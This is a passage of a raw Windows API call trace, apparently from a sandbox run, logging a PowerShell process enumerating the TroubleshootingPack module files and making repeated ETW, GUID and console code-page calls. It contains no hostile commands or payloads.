ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe238 [0157.847] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.848] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e4bcac7, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22bb5ac3, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0157.848] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91837f7c, ftCreationTime.dwHighDateTime=0x1c9ea12, ftLastAccessTime.dwLowDateTime=0x91837f7c, ftLastAccessTime.dwHighDateTime=0x1c9ea12, ftLastWriteTime.dwLowDateTime=0x91837f7c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x5075, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack.format.ps1xml", cAlternateFileName="")) returned 1 [0157.848] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd88a4ec5, ftCreationTime.dwHighDateTime=0x1ca0400, ftLastAccessTime.dwLowDateTime=0xd88a4ec5, ftLastAccessTime.dwHighDateTime=0x1ca0400, ftLastWriteTime.dwLowDateTime=0x91837f7c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x5198, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack.psd1", cAlternateFileName="")) returned 1 [0157.848] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd88a4ec5, ftCreationTime.dwHighDateTime=0x1ca0400, ftLastAccessTime.dwLowDateTime=0xd88a4ec5, ftLastAccessTime.dwHighDateTime=0x1ca0400, ftLastWriteTime.dwLowDateTime=0x91837f7c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x5198, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack.psd1", cAlternateFileName="")) returned 0 [0157.848] FindClose (in: hFindFile=0x5bfe238 | out: hFindFile=0x5bfe238) returned 1 [0157.848] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e37c) returned 1 [0157.848] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e5dc) returned 1 [0157.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x60 [0157.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", nBufferLength=0x60, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", lpFilePart=0x0) returned 0x5f [0157.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x60 [0157.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", nBufferLength=0x60, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", lpFilePart=0x0) returned 0x5f [0157.848] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e384) returned 1 [0157.849] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\troubleshootingpack.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25d3d60 | out: lpFileInformation=0x25d3d60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd88a4ec5, ftCreationTime.dwHighDateTime=0x1ca0400, ftLastAccessTime.dwLowDateTime=0xd88a4ec5, ftLastAccessTime.dwHighDateTime=0x1ca0400, ftLastWriteTime.dwLowDateTime=0x91837f7c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x5198)) returned 1 [0157.849] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e380) returned 1 [0157.852] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules")) returned 0x10 [0157.853] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e5b0 | out: lpConsoleScreenBufferInfo=0x5a0e5b0) returned 1 [0157.854] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e5b0 | out: lpConsoleScreenBufferInfo=0x5a0e5b0) returned 1 [0159.847] EtwEventActivityIdControl () returned 0x0 [0159.847] EtwEventActivityIdControl () returned 0x0 [0159.847] EtwEventActivityIdControl () returned 0x0 [0159.862] EtwEventActivityIdControl () returned 0x0 [0159.862] EtwEventActivityIdControl () returned 0x0 [0159.862] EtwEventActivityIdControl () returned 0x0 [0159.881] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x63e050 [0159.884] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x63deb8 [0160.016] CoCreateGuid (in: pguid=0x5a0e374 | out: pguid=0x5a0e374*(Data1=0xefecdf57, Data2=0x161, Data3=0x4d3c, Data4=([0]=0xa8, [1]=0x38, [2]=0xbf, [3]=0x86, [4]=0xea, [5]=0x58, [6]=0x2c, [7]=0x2c))) returned 0x0 [0160.020] QueryPerformanceCounter (in: lpPerformanceCount=0x5a0e0c0 | out: lpPerformanceCount=0x5a0e0c0*=2944483595242) returned 1 [0160.762] CoCreateGuid (in: pguid=0x5a0e374 | out: pguid=0x5a0e374*(Data1=0x18578b9b, Data2=0x22d5, Data3=0x41ee, Data4=([0]=0x94, [1]=0x2e, [2]=0xcc, [3]=0xf9, [4]=0x88, [5]=0x78, [6]=0xc0, [7]=0xc6))) returned 0x0 [0160.764] QueryPerformanceCounter (in: lpPerformanceCount=0x5a0e0c0 | out: lpPerformanceCount=0x5a0e0c0*=2944557490115) returned 1 [0161.534] CoCreateGuid (in: pguid=0x5a0df18 | out: pguid=0x5a0df18*(Data1=0x8e95eefa, Data2=0xc0ae, Data3=0x4998, Data4=([0]=0xb7, [1]=0x5c, [2]=0xd4, [3]=0xf4, [4]=0x2e, [5]=0xbf, [6]=0xf8, [7]=0xf5))) returned 0x0 [0161.534] QueryPerformanceCounter (in: lpPerformanceCount=0x5a0dd54 | out: lpPerformanceCount=0x5a0dd54*=2944634500707) returned 1 [0161.543] QueryPerformanceCounter (in: lpPerformanceCount=0x5a0dd1c | out: lpPerformanceCount=0x5a0dd1c*=2944635324557) returned 1 [0161.543] EtwEventActivityIdControl () returned 0x0 [0161.543] EtwEventActivityIdControl () returned 0x0 [0161.543] EtwEventActivityIdControl () returned 0x0 [0161.543] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0d778, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0161.557] EtwEventActivityIdControl () returned 0x0 [0161.557] EtwEventActivityIdControl () returned 0x0 [0161.557] EtwEventActivityIdControl () returned 0x0 [0161.558] EtwEventActivityIdControl () returned 0x0 [0161.744] QueryPerformanceCounter (in: lpPerformanceCount=0x5a0d8d8 | out: lpPerformanceCount=0x5a0d8d8*=2944655410339) returned 1 [0161.748] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x54c [0161.749] CoCreateGuid (in: pguid=0x5a0d7e0 | out: pguid=0x5a0d7e0*(Data1=0x27418e14, Data2=0x5147, Data3=0x4cc2, Data4=([0]=0x9f, [1]=0x47, [2]=0x7c, [3]=0x4f, [4]=0xfa, [5]=0x6d, [6]=0xf5, [7]=0xc2))) returned 0x0 [0161.749] QueryPerformanceCounter (in: lpPerformanceCount=0x5a0d61c | out: lpPerformanceCount=0x5a0d61c*=2944655970654) returned 1 [0161.757] QueryPerformanceCounter (in: lpPerformanceCount=0x5a0d5e4 | out: lpPerformanceCount=0x5a0d5e4*=2944656721897) returned 1 [0161.758] EtwEventActivityIdControl () returned 0x0 [0161.758] EtwEventActivityIdControl () returned 0x0 [0161.758] EtwEventActivityIdControl () returned 0x0 [0161.758] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0d040, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0161.759] EtwEventActivityIdControl () returned 0x0 [0161.759] EtwEventActivityIdControl () returned 0x0 [0161.759] EtwEventActivityIdControl () returned 0x0 [0161.759] EtwEventActivityIdControl () returned 0x0 [0162.096] EtwEventActivityIdControl () returned 0x0 [0162.096] EtwEventActivityIdControl () returned 0x0 [0162.096] EtwEventActivityIdControl () returned 0x0 [0162.096] EtwEventActivityIdControl () returned 0x0 [0162.241] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0def4 | out: lpConsoleScreenBufferInfo=0x5a0def4) returned 1 [0162.459] CoCreateGuid (in: pguid=0x5a0df18 | out: pguid=0x5a0df18*(Data1=0x6e74366f, Data2=0xff8, Data3=0x4d65, Data4=([0]=0x86, [1]=0xfd, [2]=0x9a, [3]=0x6c, [4]=0x9, [5]=0x63, [6]=0x80, [7]=0xe3))) returned 0x0 [0162.459] QueryPerformanceCounter (in: lpPerformanceCount=0x5a0dd54 | out: lpPerformanceCount=0x5a0dd54*=2944726980215) returned 1 [0162.464] QueryPerformanceCounter (in: lpPerformanceCount=0x5a0dd1c | out: lpPerformanceCount=0x5a0dd1c*=2944727425999) returned 1 [0162.464] EtwEventActivityIdControl () returned 0x0 [0162.464] EtwEventActivityIdControl () returned 0x0 [0162.464] EtwEventActivityIdControl () returned 0x0 [0162.464] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0d778, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0162.465] EtwEventActivityIdControl () returned 0x0 [0162.465] EtwEventActivityIdControl () returned 0x0 [0162.465] EtwEventActivityIdControl () returned 0x0 [0162.465] EtwEventActivityIdControl () returned 0x0 [0162.628] EtwEventActivityIdControl () returned 0x0 [0162.628] EtwEventActivityIdControl () returned 0x0 [0162.929] CoCreateGuid (in: pguid=0x5a0df18 | out: pguid=0x5a0df18*(Data1=0x7a2f2c3b, Data2=0x6c9a, Data3=0x40d3, Data4=([0]=0x82, [1]=0xa7, [2]=0x10, [3]=0x12, [4]=0xc8, [5]=0x91, [6]=0xa7, [7]=0x5e))) returned 0x0 [0162.929] QueryPerformanceCounter (in: lpPerformanceCount=0x5a0dd54 | out: lpPerformanceCount=0x5a0dd54*=2944774001616) returned 1 [0162.934] QueryPerformanceCounter (in: lpPerformanceCount=0x5a0dd1c | out: lpPerformanceCount=0x5a0dd1c*=2944774423244) returned 1 [0162.934] EtwEventActivityIdControl () returned 0x0 [0162.934] EtwEventActivityIdControl () returned 0x0 [0162.934] EtwEventActivityIdControl () returned 0x0 [0162.934] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0d778, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0162.935] EtwEventActivityIdControl () returned 0x0 [0162.935] EtwEventActivityIdControl () returned 0x0 [0162.935] EtwEventActivityIdControl () returned 0x0 [0162.935] EtwEventActivityIdControl () returned 0x0 [0162.971] EtwEventActivityIdControl () returned 0x0 [0162.971] EtwEventActivityIdControl () returned 0x0 [0163.071] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e544 | out: lpConsoleScreenBufferInfo=0x5a0e544) returned 1 [0163.075] GetConsoleOutputCP () returned 0x1b5 [0163.076] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.076] GetConsoleOutputCP () returned 0x1b5 [0163.077] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.077] GetConsoleOutputCP () returned 0x1b5 [0163.077] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.077] GetConsoleOutputCP () returned 0x1b5 [0163.077] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.077] GetConsoleOutputCP () returned 0x1b5 [0163.077] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.077] GetConsoleOutputCP () returned 0x1b5 [0163.078] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.078] GetConsoleOutputCP () returned 0x1b5 [0163.078] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.078] GetConsoleOutputCP () returned 0x1b5 [0163.078] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.078] GetConsoleOutputCP () returned 0x1b5 [0163.078] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.078] GetConsoleOutputCP () returned 0x1b5 [0163.078] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.079] GetConsoleOutputCP () returned 0x1b5 [0163.079] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.079] GetConsoleOutputCP () returned 0x1b5 [0163.079] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.079] GetConsoleOutputCP () returned 0x1b5 [0163.079] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.079] GetConsoleOutputCP () returned 0x1b5 [0163.079] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.079] GetConsoleOutputCP () returned 0x1b5 [0163.080] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.080] GetConsoleOutputCP () returned 0x1b5 [0163.080] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.080] GetConsoleOutputCP () returned 0x1b5 [0163.080] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.080] GetConsoleOutputCP () returned 0x1b5 [0163.080] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.080] GetConsoleOutputCP () returned 0x1b5 [0163.081] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.081] GetConsoleOutputCP () returned 0x1b5 [0163.081] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.081] GetConsoleOutputCP () returned 0x1b5 [0163.081] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.081] GetConsoleOutputCP () returned 0x1b5 [0163.081] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.081] GetConsoleOutputCP () returned 0x1b5 [0163.081] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.082] GetConsoleOutputCP () returned 0x1b5 [0163.082] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.082] GetConsoleOutputCP () returned 0x1b5 [0163.082] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.082] GetConsoleOutputCP () returned 0x1b5 [0163.082] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.082] GetConsoleOutputCP () returned 0x1b5 [0163.082] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.082] GetConsoleOutputCP () returned 0x1b5 [0163.083] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.083] GetConsoleOutputCP () returned 0x1b5 [0163.083] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.083] GetConsoleOutputCP () returned 0x1b5 [0163.083] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.083] GetConsoleOutputCP () returned 0x1b5 [0163.083] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.083] GetConsoleOutputCP () returned 0x1b5 [0163.084] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.084] GetConsoleOutputCP () returned 0x1b5 [0163.084] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.084] GetConsoleOutputCP () returned 0x1b5 [0163.084] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.084] GetConsoleOutputCP () returned 0x1b5 [0163.084] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.084] GetConsoleOutputCP () returned 0x1b5 [0163.085] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.085] GetConsoleOutputCP () returned 0x1b5 [0163.085] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.085] GetConsoleOutputCP () returned 0x1b5 [0163.085] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.085] GetConsoleOutputCP () returned 0x1b5 [0163.085] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.085] GetConsoleOutputCP () returned 0x1b5 [0163.086] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.086] GetConsoleOutputCP () returned 0x1b5 [0163.086] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.086] GetConsoleOutputCP () returned 0x1b5 [0163.086] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.086] GetConsoleOutputCP () returned 0x1b5 [0163.086] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.086] GetConsoleOutputCP () returned 0x1b5 [0163.087] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.087] GetConsoleOutputCP () returned 0x1b5 [0163.087] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.087] GetConsoleOutputCP () returned 0x1b5 [0163.087] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.087] GetConsoleOutputCP () returned 0x1b5 [0163.088] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.088] GetConsoleOutputCP () returned 0x1b5 [0163.088] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.088] GetConsoleOutputCP () returned 0x1b5 [0163.088] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.088] GetConsoleOutputCP () returned 0x1b5 [0163.088] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.088] GetConsoleOutputCP () returned 0x1b5 [0163.089] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.089] GetConsoleOutputCP () returned 0x1b5 [0163.089] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.089] GetConsoleOutputCP () returned 0x1b5 [0163.089] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.089] GetConsoleOutputCP () returned 0x1b5 [0163.089] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.089] GetConsoleOutputCP () returned 0x1b5 [0163.089] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.090] GetConsoleOutputCP () returned 0x1b5 [0163.090] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.090] GetConsoleOutputCP () returned 0x1b5 [0163.090] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.090] GetConsoleOutputCP () returned 0x1b5 [0163.090] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.090] GetConsoleOutputCP () returned 0x1b5 [0163.090] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.090] GetConsoleOutputCP () returned 0x1b5 [0163.091] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.091] GetConsoleOutputCP () returned 0x1b5 [0163.091] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.091] GetConsoleOutputCP () returned 0x1b5 [0163.091] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.091] GetConsoleOutputCP () returned 0x1b5 [0163.091] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.091] GetConsoleOutputCP () returned 0x1b5 [0163.091] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.092] GetConsoleOutputCP () returned 0x1b5 [0163.092] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.092] GetConsoleOutputCP () returned 0x1b5 [0163.092] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e3bc) returned 0 [0163.092] GetConsoleOutputCP () returned 0x1b5 [0163.092] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e3bc, dwFlags=0x2 